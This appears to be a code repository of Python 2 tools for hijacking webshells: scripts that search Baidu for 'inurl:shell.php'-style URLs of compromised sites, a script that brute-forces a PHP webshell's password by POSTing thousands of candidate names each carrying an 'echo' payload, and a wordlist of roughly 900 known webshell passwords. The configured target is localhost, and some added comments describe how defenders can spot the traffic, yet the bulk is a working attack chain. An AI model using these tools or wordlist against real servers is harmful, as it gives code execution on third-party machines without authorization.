├── BaiduAPI.py
├── WebshellCracker.py
├── WebshellSearcher.py
├── pass
    └── pass.dic
└── websites

/BaiduAPI.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# encoding:utf8

# Python 2 script (print statements). Fetches one Baidu results page for the
# query given as the first command-line argument, resolves every Baidu
# redirect link on that page, and appends each final URL to `resultFileName`.
# NOTE(review): line breaks and indentation in this listing were reconstructed
# from a collapsed page; nesting is inferred from the statement order.

import requests
from bs4 import BeautifulSoup
import sys

# config-start
keyword = sys.argv[1]  # raises IndexError when no argument is supplied
resultFileName = "webshells.txt"
# config-end

# The keyword is concatenated into the query string without URL-encoding.
url = "http://www.baidu.com/s?wd=" + keyword
print "Getting : " + url + "...",
# No timeout is passed, so a stalled connection blocks the script indefinitely.
response = requests.get(url)
print "OK!"
content = response.content
status_code = response.status_code  # stored but never checked below
soup = BeautifulSoup(content, "html.parser")
links = soup.findAll("a")
for link in links:
    try:
        dstURL = link['href']
        # The http:// / https:// test is redundant: the second startswith()
        # already requires the exact Baidu redirect prefix.
        if (dstURL.startswith("http://") or dstURL.startswith("https://")) and dstURL.startswith("http://www.baidu.com/link?url=") :
            # Following the redirect yields the real result URL.
            result_url = requests.get(dstURL).url
            # Re-opened in append mode for every hit; results accumulate across runs.
            file = open(resultFileName, "a+")
            file.write(result_url + "\r\n")
            file.close()
            print result_url
    except Exception as e:
        # Every failure (anchor without href, network error, write error) is
        # swallowed silently, so an empty result file does not prove that
        # nothing matched.
        pass

--------------------------------------------------------------------------------
/WebshellCracker.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# encoding:utf8

# Python 2 script. Sends batches of candidate parameter names to the URL in
# `url`; every candidate is a POST field whose value is `echo <marker>;`, and
# the response body is searched for the marker. Presumably the target is a PHP
# page that evaluates one POST field as code - the listing does not show it.
# The configured target is loopback (127.0.0.1), i.e. a local test instance.
#
# Defender note: one request from the live loop carries 26**3 = 17,576 form
# fields, each named with five lowercase letters and each holding the same
# `echo xxxx;` value. That shape stands out in web-server and WAF logs;
# alerting on form-field count and on repeated identical field values catches
# it, and parameter-count limits such as PHP's max_input_vars bound how many
# fields the server parses at all.
# NOTE(review): line breaks and indentation in this listing were reconstructed
# from a collapsed page; nesting is inferred from the statement order.

import requests
import random
import time
import linecache  # imported but not used anywhere in this file

startTime = time.time()

size = 100  # only referenced by the commented-out dictionary loop below
filename = "password.txt"
# Read at start-up although the live code never uses it; a missing file raises
# IOError before any request is made. The tree above lists pass/pass.dic, not
# password.txt.
passwordFile = open(filename,'rU').readlines()
url = "http://127.0.0.1/shell.php"

def getRandomString(randomlength=4):
    """Return `randomlength` characters drawn from a-z, A-Z and 0-9.

    Uses the `random` module; the value only serves as a response marker.
    """
    str = ""  # shadows the builtin `str` inside this function
    chars = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z','A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z','0','1','2','3','4','5','6','7','8','9']
    for i in range(randomlength):
        str += chars[(random.randint(0, len(chars) - 1))]
    return str

def addProIntoUrl(url,pro):
    """Return `url` with "&" and `pro` appended. Not called in this file."""
    return url + "&" + pro;

def checkTrueOrFalseByGET(url, keyword):
    """Return True when `keyword` occurs in the body of a GET to `url`.

    Only referenced from commented-out code in this file.
    """
    return ((keyword) in (requests.get(url).text))

def checkTrueOrFalseByPOST(url, postData, keyword):
    """Return True when `keyword` occurs in the body of a POST to `url`.

    The same POST is issued twice: the first response is printed, the second
    one is searched. Neither call sets a timeout.
    """
    print requests.post(url, data=postData).text
    return ((keyword) in (requests.post(url, data=postData).text))

# chars = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z','A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z','0','1','2','3','4','5','6','7','8','9']
# Module-level list; the loops below use chr(97..122) instead, so it is unused.
chars = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']

# Disabled GET variant: 26 candidates per request, appended to the query string.
# for i in range(97,123):
#     for j in range(97,123):
#         for k in range(97,123):
#             for l in range(97,123):
#                 tempurl = url
#                 randomString = getRandomString()
#                 print chr(i) + chr(j) + chr(k) + chr(l)
#                 for m in range(97,123):
#                     password = chr(i) + chr(j) + chr(k) + chr(l) + chr(m)
#                     tempurl += "&" + password + "=echo " + randomString + ";"
#                 print tempurl
#                 if checkTrueOrFalseByGET(tempurl, randomString):
#                     exit(1)


# Live loop. range(97,123) covers ord('a')..ord('z'), so the five nested loops
# enumerate every five-letter lowercase name.
for i in range(97,123):
    for j in range(97,123):
        postData = {}
        randomString = getRandomString()  # fresh marker for every batch
        print chr(i) + chr(j)
        for k in range(97,123):
            for l in range(97,123):
                for m in range(97,123):
                    password = chr(i) + chr(j) + chr(k) + chr(l) + chr(m)
                    postData[password] = "echo " + randomString + ";"
        # NOTE(review): assumed to run once per two-letter prefix, after the
        # batch is complete - confirm against the original indentation.
        # A hit ends the process with status 1; the matching name is not
        # printed, only the two-letter prefix shown above.
        if checkTrueOrFalseByPOST(url, postData, randomString):
            exit(1)


# Disabled dictionary variant: slices `passwordFile` into batches of `size`
# entries and sends each batch as GET parameters.
# passwordNumber = len(passwordFile)
# (message below: "number of passwords")
# print "密码个数 : " , passwordNumber
# times = int(passwordNumber / size)
# (message below: "number of brute-force rounds needed")
# print "需要爆破次数 : " , times

# for i in range(times):
#     startIndex = i * size
#     endIndex = (i + 1) * size
#     print "Trying : [" , startIndex , "," , endIndex , "]"
#     newlist = passwordFile[startIndex:endIndex]
#     tempurl = url + "?lilac=0"
#     randomString = getRandomString()
#     for line in newlist:
#         command = "echo '" + randomString + "';"
#         password = line[0:-1]
#         tempurl += "&" + password + "=" + command
#         # print tempurl
#     # print tempurl
#     # Request the url
#     print tempurl
#     response = requests.get(tempurl)
#     content = response.text
#     print "-----------"
#     print content
#     print "-----------"
#     if randomString in content:
#         print "[" , startIndex , "," , endIndex , "]"
#         break
#     print "\n\n\n\n"

# Elapsed wall-clock seconds; not reached when the loop above calls exit(1).
endTime = time.time()
print endTime - startTime

--------------------------------------------------------------------------------
/WebshellSearcher.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# encoding:utf8

# Python 2 driver. Runs BaiduAPI.py once per entry in `keywords`, each time
# with the search operator in `syntax` prefixed to the file name.

import os

keywords = ['guige.php', 'shell.php']
syntax = "inurl:"

for keyword in keywords:
    print "==== Searching for '" + keyword + "' ==="
    # The command is assembled by string concatenation and run through a shell
    # by os.system(). That is only safe because `keywords` holds hard-coded
    # literals; values taken from outside would need an argument list passed
    # to subprocess rather than a shell string.
    command = "python ./BaiduAPI.py " + syntax + keyword
    os.system(command)

--------------------------------------------------------------------------------
/pass/pass.dic:
--------------------------------------------------------------------------------
1 | 584521 2 | nohack 3 | 45189946 4 | hacksb 5 | hackersb 6 | heixiaozi 7 | 360 8 | sb360 9 | 360sb 10 | yushiwuzheng 11 | wuzheng 12 | spider 13 | angel 14 | 4ngel 15 | yyswxws 16 | lcx 17 | nc 18 | hackqingshu 19 | qingshu 20 | qingshu$ 21 | sz 22 | sunzi 23 | shunzi 24 | 123!@# 25 | !@#123 26 | 123654 27 | 123654789 28 | 123654789! 29 | 123654789. 
30 | aspadmin 31 | phpadmin 32 | jspadmin 33 | aspxadmin 34 | noadmin 35 | cms 36 | iamnotadmin 37 | fuckit 38 | fuckhack 39 | fuckhacker 40 | F19ht 41 | f19ht 42 | fight 43 | hkmjj 44 | chinared 45 | ouou 46 | hake 47 | hakecc 48 | wwwhakecc 49 | 520hack 50 | hack520 51 | r4sky 52 | ghost 53 | baidu 54 | yy 55 | daoqq 56 | daohao 57 | sb 58 | youaresb 59 | caonimadebi 60 | caonimade 61 | worinima 62 | wocaonima 63 | caonimei 64 | lunnijie 65 | whatweb 66 | baidusb 67 | baiduadmin 68 | chenxue 69 | cnot 70 | xxoxx 71 | rinima 72 | hkk007 73 | chengnuo 74 | wrsk 75 | wrsky 76 | 54321 77 | yuemo 78 | 521 79 | ******* 80 | 4lert 81 | yuemo 82 | maek 83 | dreamh 84 | Shell 85 | xxxxx 86 | shell 87 | 10011C120105101 88 | fclshark 89 | 19880118 90 | 376186027 91 | 654321 92 | 535039 93 | 000 94 | 123 95 | windows 96 | darkst 97 | jcksyes 98 | jinjin 99 | 12345 100 | sq19880602 101 | jtk2352 102 | sq19880602 103 | kill 104 | chengnuo 105 | 45189946 106 | 123321 107 | hacker 108 | hack 109 | haode 110 | chuang 111 | aiezu 112 | 981246 113 | et520 114 | 12 115 | lx 116 | lengxue 117 | 20080808 118 | aoyunhui 119 | fucker 120 | tiger 121 | tig 122 | tag 123 | iloveshell 124 | loveshell 125 | yrpx 126 | air 127 | hkk007 128 | wrsk 129 | rinima 130 | caonima 131 | ceshi2009 132 | kissy 133 | 520 134 | 52013 135 | 5201314 136 | 3452510 137 | 1314520 138 | rfkl 139 | username 140 | 847381979 141 | jing 142 | winner 143 | 4816535 144 | shaomo 145 | zhack 146 | mama 147 | mama520 148 | fuckyou 149 | Fuckyou 150 | FuckYou 151 | lengfeng 152 | lengfengsk 153 | rensheng 154 | rs 155 | fuck 156 | 123go 157 | 1 158 | xiaowu 159 | Baike 160 | admin888 161 | honker 162 | hongker 163 | liner 164 | lin 165 | xiaoyi 166 | xiaoe 167 | 1 168 | login 169 | 888999 170 | Evav 171 | 13572468 172 | Sa 173 | sa 174 | sasa 175 | dangdang 176 | webshell 177 | lovehack7758 178 | rfkl 179 | 123 180 | darkst 181 | asp 182 | hkmm 183 | 133135136 184 | 80sec 185 | G.xp 186 | gxp 187 | 1992724 188 | satan 
189 | Satan 190 | yong 191 | fst 192 | f.s.t 193 | F.S.T 194 | noid 195 | sadness 196 | caodan 197 | 96315001 198 | admin 199 | axiao 200 | 847381979 201 | rfkl 202 | yuemo 203 | 12 204 | bzxyd 205 | tonecan 206 | bzxyd 207 | 5201314 208 | 3est 209 | sin 210 | 654321 211 | ghost 212 | C 213 | cc 214 | evil 215 | evilhk 216 | evilhack 217 | evilhacker 218 | yong 219 | ying 220 | webadmin 221 | webadmin2 222 | HqzX 223 | tx 224 | tengxin 225 | tengxunsb 226 | danteng 227 | rusuan 228 | dantong 229 | youguest 230 | cmdshell 231 | Webshell 232 | WebShell 233 | sh3ll 234 | h4ck 235 | h4ck3r 236 | ufo 237 | ufohack 238 | jiaozu 239 | huaidan 240 | jiaozhu 241 | lover 242 | love 243 | daoker 244 | daokers 245 | daoke 246 | !@#123 247 | ******* 248 | 000 249 | 1 250 | 10011C120105101 251 | 111 252 | 12 253 | 123 254 | 123!@# 255 | 123321 256 | 12345 257 | 123456 258 | 123654 259 | 123654789 260 | 123654789! 261 | 123654789. 262 | 123go 263 | 1314520 264 | 133135136 265 | 13572468 266 | 19880118 267 | 1992724 268 | 20080808 269 | 3452510 270 | 360 271 | 360sb 272 | 376186027 273 | 3est 274 | 45189946 275 | 4816535 276 | 4lert 277 | 4ngel 278 | 520 279 | 52013 280 | 5201314 281 | 520hack 282 | 521 283 | 535039 284 | 54321 285 | 584521 286 | 654321 287 | 80sec 288 | 847381979 289 | 888999 290 | 96315001 291 | 981246 292 | admin 293 | admin888 294 | aiezu 295 | air 296 | angel 297 | aoyunhui 298 | asp 299 | aspadmin 300 | aspxadmin 301 | axiao 302 | baidu 303 | baiduadmin 304 | baidusb 305 | Baike 306 | bzxyd 307 | C 308 | caodan 309 | caonima 310 | caonimade 311 | caonimadebi 312 | caonimei 313 | cc 314 | ceshi2009 315 | chengnuo 316 | chenxue 317 | chinared 318 | chuang 319 | cmdshell 320 | cms 321 | cnot 322 | dangdang 323 | danteng 324 | dantong 325 | daohao 326 | daoke 327 | daoker 328 | daokers 329 | daoqq 330 | darkst 331 | dreamh 332 | et520 333 | Evav 334 | evil 335 | evilhack 336 | evilhacker 337 | evilhk 338 | F.S.T 339 | f19ht 340 | fclshark 341 | fight 342 | fst 
343 | fuck 344 | fucker 345 | fuckhack 346 | fuckhacker 347 | fuckit 348 | FuckYou 349 | G.xp 350 | ghost 351 | gxp 352 | h4ck 353 | h4ck3r 354 | hack 355 | hack520 356 | hacker 357 | hackersb 358 | hackqingshu 359 | hacksb 360 | hake 361 | hakecc 362 | haode 363 | heixiaozi 364 | hkk007 365 | hkmjj 366 | hkmm 367 | hongker 368 | honker 369 | HqzX 370 | huaidan 371 | iamnotadmin 372 | iloveshell 373 | jcksyes 374 | jiaozhu 375 | jiaozu 376 | jing 377 | jinjin 378 | jspadmin 379 | jtk2352 380 | kill 381 | kissy 382 | lcx 383 | lengfeng 384 | lengfengsk 385 | lengxue 386 | lin 387 | liner 388 | login 389 | love 390 | lovehack7758 391 | lover 392 | loveshell 393 | lunnijie 394 | lx 395 | maek 396 | mama 397 | mama520 398 | nc 399 | noadmin 400 | nohack 401 | noid 402 | ouou 403 | phpadmin 404 | qingshu 405 | qingshu$ 406 | r4sky 407 | rensheng 408 | rfkl 409 | rinima 410 | rs 411 | rusuan 412 | sa 413 | sadness 414 | sasa 415 | Satan 416 | sb 417 | sb360 418 | sh3ll 419 | shaomo 420 | shell 421 | shunzi 422 | sin 423 | spider 424 | sq19880602 425 | sunzi 426 | sz 427 | guige 428 | T00ls 429 | tag 430 | tengxin 431 | tengxunsb 432 | tig 433 | tiger 434 | tonecan 435 | tx 436 | ufo 437 | ufohack 438 | username 439 | webadmin 440 | webadmin2 441 | WebShell 442 | whatweb 443 | windows 444 | winner 445 | wocaonima 446 | worinima 447 | wrsk 448 | wrsky 449 | wuzheng 450 | wwwhakecc 451 | xiaoe 452 | xiaowu 453 | xiaoyi 454 | xxoxx 455 | xxxxx 456 | ying 457 | yong 458 | youaresb 459 | youguest 460 | yrpx 461 | yuemo 462 | yushiwuzheng 463 | yy 464 | yyswxws 465 | zhack 466 | 01314 467 | 584521 468 | nohack 469 | 45189946 470 | baidu 471 | 123 472 | chenxue 473 | and 474 | 913720787 475 | cnot 476 | xxoxx 477 | rinima 478 | hkk007 479 | chengnuo 480 | 5556661221 481 | 123456 482 | wrsk 483 | 54321 484 | yuemo 485 | jcksyes 486 | 521 487 | ******* 488 | 4lert 489 | yuemo 490 | hacker 491 | xxxxx 492 | 10011C120105101 493 | fclshark 494 | 19880118 495 | 376186027 496 | admin 
497 | 654321 498 | 535039 499 | admin 500 | 000 501 | 123 502 | darkst 503 | jcksyes 504 | 123456 505 | jcksyes 506 | jinjin 507 | 12345 508 | sq19880602 509 | jtk2352 510 | sq19880602 511 | kill 512 | chengnuo 513 | 45189946 514 | 123321 515 | admin 516 | hacker 517 | admin 518 | haode 519 | chuang 520 | 981246 521 | et520 522 | winner 523 | 12 524 | 20080808 525 | yrpx 526 | hkk007 527 | wrsk 528 | rinima 529 | ceshi2009 530 | 5201314 531 | rfkl 532 | 847381979 533 | jing 534 | winner 535 | 4816535 536 | zhack 537 | mama520 538 | 123go 539 | 1 540 | 888999 541 | 13572468 542 | sasa 543 | dangdang 544 | lovehack7758 545 | rfkl 546 | 123 547 | 80sec 548 | hkmm 549 | 133135136 550 | 1992724 551 | yong 552 | noid 553 | caodan 554 | 96315001 555 | admin 556 | axiao 557 | 847381979 558 | rfkl 559 | yuemo 560 | 12 561 | 535039 562 | bzxyd 563 | tonecan 564 | bzxyd 565 | 5201314 566 | 3est 567 | sin 568 | 654321 569 | ghost 570 | C 571 | yong 572 | webadmin 573 | 5909062xzx 574 | iolhcw19891209 575 | hehe 576 | china 577 | 584521 578 | nohack 579 | 45189946 580 | baidu 581 | 123 582 | chenxue 583 | and 584 | 913720787 585 | cnot 586 | xxoxx 587 | rinima 588 | hkk007 589 | chengnuo 590 | 5556661221 591 | 123456 592 | wrsk 593 | 54321 594 | yuemo 595 | jcksyes 596 | 521 597 | ******* 598 | 4lert 599 | yuemo 600 | 5201314 601 | hacker 602 | xxxxx 603 | 10011C120105101 604 | fclshark 605 | 19880118 606 | 376186027 607 | admin 608 | 654321 609 | 535039 610 | admin 611 | 000 612 | 123 613 | darkst 614 | jcksyesHacker 615 | 123456 616 | jcksyes 617 | jinjinWebShell 618 | 12345 619 | sq19880602 620 | jtk2352 621 | sq19880602 622 | killEdu 623 | chengnuo 624 | 45189946 625 | 123321 626 | admin 627 | hacker 628 | admin 629 | haode 630 | chuang 631 | 981246 632 | et520 633 | winner 634 | 12 635 | 20080808 636 | yrpx 637 | hkk007 638 | wrsk 639 | rinima 640 | ceshi2009 641 | 5201314 642 | rfkl 643 | 847381979 644 | jing 645 | winner 646 | 4816535 647 | zhack 648 | mama520 649 | 
123go 650 | 1 651 | 888999 652 | 13572468 653 | sasa 654 | dangdang 655 | lovehack7758 656 | rfkl 657 | 123 658 | 80sec 659 | hkmm 660 | 133135136 661 | 1992724 662 | yong 663 | noid 664 | caodan 665 | 96315001 666 | admin 667 | axiao 668 | 847381979 669 | rfkl 670 | yuemo 671 | 12 672 | 535039 673 | bzxyd 674 | tonecan 675 | bzxyd 676 | 5201314 677 | 3est 678 | sin 679 | 654321 680 | ghost 681 | C 682 | yong 683 | webadmin 684 | 5909062xzx 685 | iolhcw19891209 686 | hehe 687 | 5242129 688 | 520 689 | yy520 690 | xuexue 691 | xiaobai 692 | tg 693 | hack19 694 | 914 695 | 7 696 | 1234 697 | beyond 698 | 123456 699 | beyond 700 | zhu 701 | 2010 702 | 20010 703 | 110 704 | 2012 705 | sh 706 | 147852 707 | chengmin 708 | admin 709 | mask 710 | linyu520 711 | hhtzgh 712 | 007007 713 | xiaozan 714 | www.91ri.org 715 | jiejie 716 | 13822642918 717 | xiaojun 718 | yanhua 719 | a 720 | qqq 721 | yanghai 722 | 168888 723 | latcue 724 | 542531 725 | lin 726 | xiaohao 727 | 13311 728 | hack121314 729 | maya66 730 | admin 731 | 123456 732 | 1478523 733 | maya66 734 | aishang 735 | hyj123 736 | woaizuozuo 737 | baiduwocaoni74 738 | 4422663 739 | Beta3 740 | 8420910 741 | hkxsDoorhkmm 742 | 10086 743 | hkk007 744 | wrsk 745 | rinima 746 | ceshi2009 747 | 5201314 748 | rfkl 749 | 847381979 750 | jing 751 | winner 752 | 4816535 753 | zhack 754 | mama520 755 | 123go 756 | 1 757 | 888999 758 | 13572468 759 | sasa 760 | dangdang 761 | lovehack7758 762 | rfkl 763 | 123 764 | 1992724 765 | yong 766 | noid 767 | caodan 768 | 96315001 769 | admin 770 | axiao 771 | 847381979 772 | rfkl 773 | yuemo 774 | 12 775 | 535039 776 | bzxyd 777 | tonecan 778 | bzxyd 779 | 5201314 780 | 3est 781 | sin 782 | 654321 783 | ghost 784 | C 785 | yong 786 | webadmin 787 | 5909062xzx 788 | iolhcw19891209 789 | admin 790 | qwe32100 791 | xiaoke 792 | panda 793 | xiaoyu 794 | 123 795 | maomao3 796 | Acces 797 | 123456 798 | 596861877 799 | jieshao 800 | hxhack 801 | 1024 802 | 1024或520 803 | love 804 | 1 805 | 
574787 806 | ding130694343 807 | 1273568669 808 | NTIw 809 | YXBwbGVxaQ== 810 | www.91ri.org 811 | 4133133 812 | 478421259 813 | 1992 814 | admin123 815 | 204298273196298273197298273 816 | 5121705或123 817 | xm 818 | 4911687 819 | 5121705 820 | laoduo 821 | seo0510 822 | xiaoke 823 | 574787 824 | cmder 825 | 2131321 826 | 574787 827 | 195298273203298273193298273193298273203298273 828 | wxb630513 829 | aa296419130 830 | 8585392 831 | simin 832 | 135 833 | 116166 834 | 8475352 835 | 978332153 836 | wangzi 837 | xiaobai 838 | 464630316 839 | admin$ 840 | 97086407 841 | lzh 842 | soojoy 843 | gg 844 | axiao 845 | 131524 846 | 13141234567 847 | sunhao 848 | 19860625 849 | nishiwodeshei 850 | vc 851 | vc110 852 | kaifeng 853 | yangxiaochou 854 | 64559216 855 | 697467 856 | wangluoheishou 857 | a 858 | admin 859 | 192298273208298273192298273185298273187298273195298273 860 | xnhack 861 | admin 862 | TNTHK 863 | NTIw 864 | admin 865 | suanle 866 | suanle. 867 | 5858 868 | 123456jin 869 | Hlly_ 870 | admin 871 | dandan 872 | DGQAIZJJxx 873 | love8 874 | bingke 875 | my3800 876 | jianlong 877 | fanhexiang 878 | hack135. 879 | str1ven93 880 | cc 881 | 454846275 882 | sxm 883 | 2564335 884 | 120 885 | 13141234567 886 | skwr 887 | kuangrenjishu 888 | xiaoxin 889 | 558 890 | xch 891 | 33201314 892 | 80499712 893 | 10086 894 | hake 895 | 1324520xxxx 896 | 789456 897 | aaa 898 | hackerxl 899 | 338956 900 | 5174187 901 | !@#asd 902 | 794743652 903 | xxoo0 904 | -------------------------------------------------------------------------------- /websites: -------------------------------------------------------------------------------- 1 | http://127.0.0.1/shell.php 2 | 3 | --------------------------------------------------------------------------------